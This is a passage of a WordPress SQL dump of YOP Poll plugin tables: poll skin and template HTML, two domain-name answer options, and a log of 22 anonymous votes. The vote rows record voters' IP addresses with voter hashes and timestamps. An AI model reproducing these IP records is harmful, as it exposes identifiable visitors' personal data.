center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(54, 'basic-pretty', 'Minimal Yellow', 'minimal-yellow', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="minimal" data-cscheme="yellow">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:7:"minimal";s:11:"colorScheme";s:6:"yellow";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(55, 'basic-pretty', 'Minimal Pink', 'minimal-pink', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="minimal" data-cscheme="pink">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:7:"minimal";s:11:"colorScheme";s:4:"pink";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(56, 'basic-pretty', 'Minimal Purple', 'minimal-purple', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="minimal" data-cscheme="purple">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:7:"minimal";s:11:"colorScheme";s:6:"purple";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00');
;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_yoppoll_subelements`
--

CREATE TABLE `wpou_yoppoll_subelements` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `poll_id` int(11) NOT NULL,
  `element_id` int(11) NOT NULL,
  `stext` text NOT NULL,
  `author` bigint(20) NOT NULL,
  `stype` varchar(20) NOT NULL,
  `status` varchar(20) NOT NULL,
  `sorder` int(11) NOT NULL,
  `meta_data` longtext NOT NULL,
  `total_submits` int(11) NOT NULL,
  `added_date` datetime NOT NULL,
  `modified_date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Dumping data for table `wpou_yoppoll_subelements`
--

INSERT INTO `wpou_yoppoll_subelements` VALUES
(1, 1, 1, 'howtobehappysecret.com', 1, 'text', 'active', 1, 'a:4:{s:11:"makeDefault";s:2:"no";s:8:"makeLink";s:2:"no";s:4:"link";s:0:"";s:12:"resultsColor";s:7:"#000000";}', 2, '2023-06-21 09:34:15', '2023-07-03 05:47:50'),
(2, 1, 1, 'howtobehappysecret.com', 1, 'text', 'deleted', 0, 'a:4:{s:11:"makeDefault";s:2:"no";s:8:"makeLink";s:2:"no";s:4:"link";s:0:"";s:12:"resultsColor";s:7:"#000000";}', 0, '2023-06-21 09:34:15', '2023-06-26 06:54:19'),
(3, 1, 1, 'teachmehowtobehappy.com', 1, 'text', 'active', 2, 'a:4:{s:11:"makeDefault";s:2:"no";s:8:"makeLink";s:2:"no";s:4:"link";s:0:"";s:12:"resultsColor";s:7:"#000000";}', 3, '2023-06-30 08:38:32', '2023-07-03 05:47:50');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_yoppoll_templates`
--

CREATE TABLE `wpou_yoppoll_templates` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `base` varchar(255) NOT NULL,
  `description` text NOT NULL,
  `html_preview` text NOT NULL,
  `added_date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Dumping data for table `wpou_yoppoll_templates`
--

INSERT INTO `wpou_yoppoll_templates` VALUES
(1, 'Basic Template', 'basic', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px;padding-bottom: 14px;">\n						<div class="row">\n							<div class="col-md-12">\n								<div class="basic-inner">\n									<form class="basic-form">\n										<div class="basic-elements">\n											<div class="basic-element basic-question basic-question-text-vertical">\n												<div class="basic-question-title">\n													<h5>Poll Question</h5>\n												</div><!-- end basic-question-title -->\n												<ul class="basic-answers">\n													<li class="basic-answer">\n														<div class="basic-answer-content basic-text-vertical">\n															<input type="radio" checked>    \n															<label class="basic-text">Answer 1</label>\n														</div>\n													</li>\n													<li class="basic-answer">\n														<div class="basic-answer-content basic-text-vertical">\n															<input type="radio">    \n															<label class="basic-text">Answer 2</label>\n														</div>\n													</li>\n													<li class="basic-answer">\n														<div class="basic-answer-content basic-text-vertical">\n															<input type="radio">    \n															<label class="basic-text">Answer 3</label>\n														</div>\n													</li>\n													<li class="basic-answer">\n														<div class="basic-answer-content basic-text-vertical">\n															<input type="radio">    \n															<label class="basic-text">Answer 4</label>\n														</div>\n													</li>\n													<li class="basic-answer">\n														<div class="basic-answer-content basic-text-vertical">\n															<input type="radio">    \n															<label class="basic-text">Answer 5</label>\n														</div>\n													</li>\n												</ul><!-- end basic-answers -->\n											</div><!-- end basic-element basic-question -->\n											<div class="clearfix"></div>\n										</div><!-- end basic-elements -->\n										<div class="basic-vote">\n											<a href="#" class="button basic-vote-button">Vote</a>\n										</div><!-- end basic-vote -->\n									</form><!-- end basic-form" -->\n								</div><!-- end basic-inner -->\n							</div><!-- end col-md-12 -->\n						</div><!-- end row -->\n					</div><!-- end basic-yop-poll-container -->', '2023-06-21 09:29:39'),
(2, 'Basic Template With Pretty Controls', 'basic-pretty', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="square" data-cscheme="red">\n						<div class="row">\n							<div class="col-md-12">\n								<div class="basic-inner">\n									<form class="basic-form">\n										<div class="basic-elements">\n											<div class="basic-element basic-question basic-question-text-vertical">\n												<div class="basic-question-title">\n													<h5>Poll Question</h5>\n												</div><!-- end basic-question-title -->\n												<ul class="basic-answers">\n													<li class="basic-answer">\n														<div class="basic-answer-content basic-text-vertical">\n															<input type="radio" checked>    \n															<label class="basic-text">Answer 1</label>\n														</div>\n													</li>\n													<li class="basic-answer">\n														<div class="basic-answer-content basic-text-vertical">\n															<input type="radio">    \n															<label class="basic-text">Answer 2</label>\n														</div>\n													</li>\n													<li class="basic-answer">\n														<div class="basic-answer-content basic-text-vertical">\n															<input type="radio">    \n															<label class="basic-text">Answer 3</label>\n														</div>\n													</li>\n													<li class="basic-answer">\n														<div class="basic-answer-content basic-text-vertical">\n															<input type="radio">    \n															<label class="basic-text">Answer 4</label>\n														</div>\n													</li>\n													<li class="basic-answer">\n														<div class="basic-answer-content basic-text-vertical">\n															<input type="radio">    \n															<label class="basic-text">Answer 5</label>\n														</div>\n													</li>\n												</ul><!-- end basic-answers -->\n											</div><!-- end basic-element basic-question -->\n											<div class="clearfix"></div>\n										</div><!-- end basic-elements -->\n										<div class="basic-vote">\n											<a href="#" class="button basic-vote-button">Vote</a>\n										</div><!-- end basic-vote -->\n									</form><!-- end basic-form" -->\n								</div><!-- end basic-inner -->\n							</div><!-- end col-md-12 -->\n						</div><!-- end row -->\n					</div><!-- end basic-yop-poll-container -->', '2023-06-21 09:29:39');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_yoppoll_votes`
--

CREATE TABLE `wpou_yoppoll_votes` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `poll_id` int(11) NOT NULL,
  `user_id` bigint(20) NOT NULL,
  `user_email` varchar(255) DEFAULT NULL,
  `user_type` varchar(100) NOT NULL,
  `ipaddress` varchar(100) NOT NULL,
  `tracking_id` varchar(255) NOT NULL,
  `voter_id` varchar(255) NOT NULL,
  `voter_fingerprint` varchar(255) NOT NULL,
  `vote_data` longtext NOT NULL,
  `status` varchar(10) NOT NULL,
  `added_date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Dumping data for table `wpou_yoppoll_votes`
--

INSERT INTO `wpou_yoppoll_votes` VALUES
(1, 1, 0, '', 'anonymous', '110.224.104.48', '', '5296b713eb12dcf393339e3aa14eca02', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'deleted', '2023-06-21 09:51:26'),
(2, 1, 0, '', 'anonymous', '117.98.32.85', '', '169d6aa719869bbd48c6b1994bf062b4', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"2";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'deleted', '2023-06-21 10:11:42'),
(3, 1, 0, '', 'anonymous', '157.48.158.239', '', '52d69bfa9acd164b434621726c31e89f', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:4:"1034";}}', 'deleted', '2023-06-21 15:14:30'),
(4, 1, 0, '', 'anonymous', '85.255.236.224', '', '4b8b0644fafd7130420d6fd20b2faa4f', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'deleted', '2023-06-26 10:38:22'),
(5, 1, 0, '', 'anonymous', '85.255.236.224', '', '4b8b0644fafd7130420d6fd20b2faa4f', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"2";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'deleted', '2023-06-26 10:55:38'),
(6, 1, 0, '', 'anonymous', '103.211.134.192', '', '66e5ed3c0a02ad9dfff9af801f9c61de', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'deleted', '2023-06-30 16:07:35'),
(7, 1, 0, '', 'anonymous', '103.211.134.192', '', '66e5ed3c0a02ad9dfff9af801f9c61de', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'deleted', '2023-06-30 16:07:44'),
(8, 1, 0, '', 'anonymous', '90.203.140.198', '', '0bbe368d06ffd16a489eb18d0fcd8cba', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'deleted', '2023-06-30 18:48:42'),
(9, 1, 0, '', 'anonymous', '90.204.107.214', '', 'c442d2db560ba6c49488d06f636a7e1f', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'deleted', '2023-06-30 19:25:43'),
(10, 1, 0, '', 'anonymous', '49.36.106.206', '', 'bb03d6a9e0cdcf4611e25231a86214eb', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'deleted', '2023-07-02 15:46:07'),
(11, 1, 0, '', 'anonymous', '106.192.29.71', '', '3ef51acd5e5d256b8351fb871e8be528', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'deleted', '2023-07-02 16:15:13'),
(12, 1, 0, '', 'anonymous', '106.211.60.34', '', '55ec175646b2efc1babca5bcbcdc8699', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'deleted', '2023-07-02 17:03:25'),
(13, 1, 0, '', 'anonymous', '45.114.192.5', '', 'b17531fd7d78085a9b259c13c6fb910a', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'deleted', '2023-07-02 17:03:59'),
(14, 1, 0, '', 'anonymous', '45.114.192.5', '', 'b17531fd7d78085a9b259c13c6fb910a', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'deleted', '2023-07-02 17:04:03'),
(15, 1, 0, '', 'anonymous', '27.61.14.117', '', '095f4185ac80f302442462f2f3501549', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'deleted', '2023-07-02 17:06:18'),
(16, 1, 0, '', 'anonymous', '45.114.192.5', '', 'b17531fd7d78085a9b259c13c6fb910a', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'deleted', '2023-07-02 17:16:11'),
(17, 1, 0, '', 'anonymous', '42.111.114.16', '', '29ed81295bed00c9ef0d9927d2ecbceb', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'deleted', '2023-07-02 17:46:43'),
(18, 1, 0, '', 'anonymous', '152.58.225.114', '', 'c8cd318f587be0a573a9249fbb1084da', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:2:"88";}}', 'active', '2023-07-03 09:37:25'),
(19, 1, 0, '', 'anonymous', '49.43.154.205', '', '989b1c42997e82135be2c8c4e948064f', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:4:"1034";}}', 'active', '2023-07-03 11:43:11'),
(20, 1, 0, '', 'anonymous', '157.46.121.67', '', '2b315d55a21866aa7b6dd3e79b051b7d', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:4:"1034";}}', 'active', '2023-07-03 16:45:26'),
(21, 1, 0, '', 'anonymous', '157.46.121.67', '', '2b315d55a21866aa7b6dd3e79b051b7d', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"1";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:4:"1034";}}', 'active', '2023-07-03 16:47:34'),
(22, 1, 0, '', 'anonymous', '27.58.214.104', '', 'd78743318d4e81320e32f65c6bffc440', '', 'a:3:{s:8:"elements";a:1:{i:0;a:3:{s:2:"id";s:1:"1";s:4:"type";s:8:"question";s:4:"data";a:1:{i:0;a:2:{s:2:"id";s:1:"3";s:4:"data";s:1:"1";}}}}s:4:"user";a:2:{s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";}s:9:"meta_data";a:1:{s:7:"page_id";s:4:"1034";}}', 'active', '2023-07-03 17:05:17');

-- --------------------------------------------------------

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
